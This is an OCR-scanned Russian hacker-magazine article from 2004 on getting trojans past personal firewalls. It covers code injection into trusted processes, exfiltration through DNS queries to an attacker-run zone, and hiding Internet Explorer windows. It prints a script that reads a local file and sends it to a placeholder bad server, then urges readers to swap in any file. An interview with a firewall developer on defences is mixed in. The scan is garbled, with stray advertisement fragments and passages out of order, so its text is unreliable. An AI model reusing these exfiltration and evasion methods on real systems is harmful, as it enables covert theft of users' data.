А вот пример обхода фильтрации с использованием UNICODE - www.security.nnov.ru/opossum/test2.html. Работает на многих персональных межсетевых экранах, в том числе и на Outpost. Преобразовать свой html в UNICODE проще простого – запусти Notepad, нажми "Сохранить как" и в диалоговом окне выбери кодировку.

Практически все персональные межсетевые экраны реализуют проверку приложений, пытающихся работать с сетью. Они умеют отслеживать сетевую активность приложений, пропуская разрешенное приложение, например Internet Explorer, и блокируя все остальные. Сетевые фаерволы также умеют разграничивать доступ к ресурсам на уровне приложений. К примеру, Microsoft ISA Server при использовании Firewall Client позволяет указывать, каким из приложений можно пользоваться для выхода во внешнюю сеть.

Казалось бы, контроль сетевых приложений – весьма вредная вещь для большинства троянских программ.

Однако это не так. Существует огромное количество методов, позволяющих обойти эту фильтрацию. Основные из них:

использование собственных сетевых драйверов

внедрение кода в память доверенных процессов (Code Injection)

использование служебных протоколов

использование доверенных приложений для утечки данных

Первые два метода требуют, чтобы троянская программа была запущена с правами администратора.

ИСПОЛЬЗОВАНИЕ СОБСТВЕННЫХ СЕТЕВЫХ ДРАЙВЕРОВ

Устанавливается свой собственный сетевой драйвер, работающий напрямую с NDIS. Если МСЭ фильтрует трафик на уровне Winsock, он просто «не видит» проходящего трафика. Сейчас трюк не актуален, поскольку он избитый и большинство фаерволов его ловит.

ВНЕДРЕНИЕ КОДА В ПАМЯТЬ ДОВЕРЕННЫХ ПРОЦЕССОВ (CODE INJECTION)

Внедрение кода использует другой подход. В памяти ищется заведомо разрешенная программа, в ее адресное пространство внедряется код, через который осуществляется взаимодействие с клиентской частью троянской программы. Межсетевой экран разрешил взаимодействие программы с внешней сетью, поэтому он пропускает и запросы троянца.

Есть несколько методов внедрения в адресное пространство других процессов (подробнее об этом читай в статьей "Игра в прятки"). Один из них

– подмена API и DLL Injection. Этот метод широко используется rootkits для Windows. Недавно на сайте www.xakep.ru

была опубликована статья о реализации этого метода на Delphi (www.xakep.ru/ post/23288/default.asp). А по адресу www.forum.sources.ru/index.php?showtopic=48014 смотри перевод статьи Holy Father, создателя известного инструмента Hacker Defender. Внедрение в процессы подробно и с примерами описано в статье rattle, опубликованной в свежем Phrack (www.phrack.org/ show.php?p=62&a=13). Там же есть исходник приложения, внедряющегося в запущенный IE и уже в его контексте работающий с сетью.

Однако, как говорилось, подобные методы требуют, чтобы троян был запущен с правами администратора, что не всегда возможно. Два последних метода (использование служебных протоколов и использование доверенных приложений для утечки данных) лишены этого недостатка.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

ИСПОЛЬЗОВАНИЕ СЛУЖЕБНЫХ ПРОТОКОЛОВ И ДОВЕРЕННЫХ ПРИЛОЖЕНИЙ ДЛЯ УТЕЧКИ ДАННЫХ

Использование служебных протоколов позволяет «выводить» данные с атакуемого компьютера через те сетевые службы, которые обычно не фильтруются межсетевыми экранами. Например, троянская программа запускает команду ping deww2362hewuiw. megahackersuper.wherehere.ru. Windows посылает DNS запрос на разрешение имени в IP-адрес. Межсетевой экран пропускает этот запрос. На приемной стороне стоит «специализированный» сервер DNS, отвечающий за зону megahackersuper. wherehere.ru, который извлекает из имени (deww2362hewuiw) полезные данные и возвращает в ответе команды трояну. В результате имеем канал утечки. Еще один интересный способ

– запустить Internet Explorer и попросить его передать данные во внешний мир. Но здесь возникает одна проблема – IE надо запускать в скрытом режиме, чтобы пользователя не удивляли непонятные окна на рабочем столе, занимающиеся своими делами.

Но большинство экранов знают об этой возможности и перехватывают запуск приложений с типом отображения SW_HIDE. Есть один нехитрый способ обойти подобную защиту – запустить IE в нормально режиме, после чего сразу же послать окну команду »

Персональные межсетевые экраны (МСЭ)

очень популярны, так как могут защитить от проникновения вредоносного кода и утечки ценной информации.

Основа защиты любого межсетевого экрана - фильтрация трафика, которая заключается в анализе посылаемых/принимаемых пакетов.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha
	W I N D O W S
	Í À
	À Ò À Ê À

Более эффективная фильтрация - на прикладном уровне протокола TCP/IP (фильтрация содержимого).

Чтобы нейтрализовать попытки использования доверенных приложений троянами, МСЭ перехватывают запуск приложений с типом отображения SW_HIDE.

hang

NOW!

ЗАЩИТА

ЗАЩИТАСНАРУЖИИИЗНУТРИ

BUY

w Click

ЭНДИ ЯМОВ, КОМПАНИЯ «АГНИТУМ», ВЕДУЩИЙ ПРОГРАММИСТ ПРОЕКТА OUTPOST FIREWALL

-x cha

XS: Зачем помимо антивируса нужно ставить еще и фаервол?

Ýß: Фаервол защищает от внешних атак, а антивирус ориентирован на вирусы, уже попавшие на компьютер. Поэтому разумно использовать одновременно оба способа защиты. Большинство современных вирусов используют интернет для распространения. Фаервол контролирует трафик, практически не влияя на скорость соединения. В тоже время файловый монитор антивируса должен проверять все открываемые файлы для обеспечения защиты, что снижает производительность жесткого диска в десятки раз.

XS: Достаточно ли фаервола для защиты компьютера?

Ýß: Современный фаервол обеспечивает высокий уровень защиты от внешних атак. Однако, в случае если вредоносный код уже попал на компьютер пользователя, у него есть десятки способов обойти защиту, начиная c внедрения в доверенный процесс и кончая блокировкой функций фаервола и остановкой сервиса. Полную безопасность может дать только разумное назначение прав пользователю. Скажем, начать следует с отказа от использования административной учетной записи (администратора) для повседневной работы.

XS: Является ли защита фаерволом абсолютной?

Ýß: Фаерволу недостаточно осуществлять только контроль за исходящими соединениями, чтобы обезопасить пользователя от утечки информации. Для обхода многих фаерволов программе-шпиону достаточно в активном браузере отрыть URL типа www.somesite.com/post_private_info/username/password. Это легко можно сделать, использовав explorer. Для предотвращения утечки информации следует использовать фаервол, контролирующий также межпроцессные взаимодействия: запись в память другого процесса, установка контекста потока, OLE, DDE и COM.

XS: Зачем фаерволу необходима технология SPI (динамической фильтрации пакетов) для TCP-протокола? Ýß: Суть технологии заключается в анализе содержимого посылаемых пакетов и в динамическом формировании правил для приема. Во-первых, SPI требуется для корректной реализации работы протоколов с открытием портов на стороне клиента. К примеру, FTP: для того чтобы не открывать все TCP-порты на соединения с удаленного порта 20, пакетный фильтр анализирует содержимое всех передаваемых пакетов на наличие команды PORT и открывает те порты, которые открыты FTP-клиентом и только для работы с IP сервера.

XS: Что дает технология SPI для UDP?

Ýß: Для UDP SPI дает возможность принимать пакеты, которые являются ответами на запросы, посланные с машины пользователя, и игнорировать все остальные. При отсылке UDP пакета формируется временное правило, разрешающее прием пакетов с удаленного адреса и порта. Типичный пример - DNS, будем получать ответы на

все наши запросы и в то же время отбивать остальные пакеты, присланные с 53 порта.

XS: Для чего нужен Component Control?

Ýß: Формально контроль компонент не является функцией персонального фаервола. Однако на практике обойти фаервол без контроля компонент до смешного просто - достаточно подменить основной исполняемый файл разрешенного приложения (например, iexplore.exe) или приписать свой код к любой распространенной DLL. И можно использовать настроенные правила приложения для доступа в сеть от его имени.

XS: Почему следует блокировать RAWSOCKET пакеты?

Ýß: Появившийся в Windows 2000 механизм отсылки и приема RAWSOCKET пакетов, несомненно, принес определенную пользу для программирования экзотических приложений. Однако в тоже время он породил огромную дыру в безопасности системы. Приложения получи- ли возможность формировать пакет самостоятельно и, соответственно, указывать произвольные протоколы, порты и адреса. При перехвате IP-пакетов установить принадлежность таких пакетов соединениям и приложениям невозможно. Поэтому, с точки зрения безопасности, следует запрещать работу с RAWSOCKET средствами фаервола для всех приложений, за исключением ряда специальных утилит.

XS: В чем опасность разрешения встроенного DNS Cache?

Ýß: В Windows 2000 появилась встроенная функция кэширования DNS запросов. Этот, в общем-то, отрадный факт омрачен тем, что доступ в сеть для DNS запроса осуществляется централизованно процессом SVCHOST.EXE. Соответственно, фаервол не может установить процесс, который инициировал запрос. Ситуация осложняется тем, что атакующему процессу для переда- чи наружу приватной информации в DNS пакете не требуется прямое обращение к специальному DNS серверу - все запросы к нему передадутся автоматически DNS сервером, указанным в сетевых настройках. Поэтому для полной безопасности следует отключать встроенный DNS Cache и глобальное правило фаервола, разрешающее DNS запрос. Оставлять только разрешение на DNS запрос для конкретных приложений.

XS: Как должна быть реализована защита остановки сервиса фаервола?

Ýß: Правильно настроенный фаервол должен запрашивать пароль при выходе (обычно эта процедура некоторым образом защищена от автоматизации), для того чтобы предотвратить остановку сервиса атакующей программой. В случае, если атакующий процесс имеет достаточно привилегий для записи в память сервиса фаервола, защититься от остановки сервиса невозможно. Для обхода этой уязвимости драйвер фаервола должен уметь блокировать всю сетевую активность в случае аварийного завершения сервиса.

SW_HIDE. Если все делать оперативно, пользователь ничего не заметит.

А как же Internet Explorer будет копировать с жесткого диска ценную информацию? Для этого можно воспользоваться сценариями. Посмотри на пример:

<script> Set fso =

CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile("c:\\boot.ini", 1,

False)

While Not f.atEndOfStream s = f.ReadLine

ss=ss+"<br>"+s

Wend document.location.href="http://<badserv-

er>/getfile.asp?"&ss

</script>

Эта небольшая программа считывает с жесткого диска содержимое файла boot.ini и передает его на <badserver>, используя тот же экземпляр браузера, в котором выполняется. Пример такого трояна можно найти в статье на www.securitylab.ru/46765.html. Подправь boot.ini на нужный файл и вперед. E

ХАКЕРСПЕЦ 11(48) 2004

<<< < Предыдущая 1 2 3 4 5 6 7 8 910 / 1410 11 12 13 14 > Следующая >>>

Соседние файлы в папке специальные выпуски

#
20.04.202412.23 Mб16Специальный выпуск 43_Optimized.pdf
#
20.04.202410.68 Mб17Специальный выпуск 44_Optimized.pdf
#
20.04.202411.27 Mб15Специальный выпуск 45_Optimized.pdf
#
20.04.202412.65 Mб14Специальный выпуск 46_Optimized.pdf
#
20.04.202411.92 Mб16Специальный выпуск 47_Optimized.pdf
#
20.04.20249.21 Mб16Специальный выпуск 48_Optimized.pdf
#
20.04.20249.67 Mб14Специальный выпуск 49_Optimized.pdf
#
20.04.20249.14 Mб15Специальный выпуск 50_Optimized.pdf
#
20.04.20248.45 Mб14Специальный выпуск 51_Optimized.pdf
#
20.04.20249.27 Mб16Специальный выпуск 52_Optimized.pdf
#
20.04.20249.18 Mб16Специальный выпуск 53_Optimized.pdf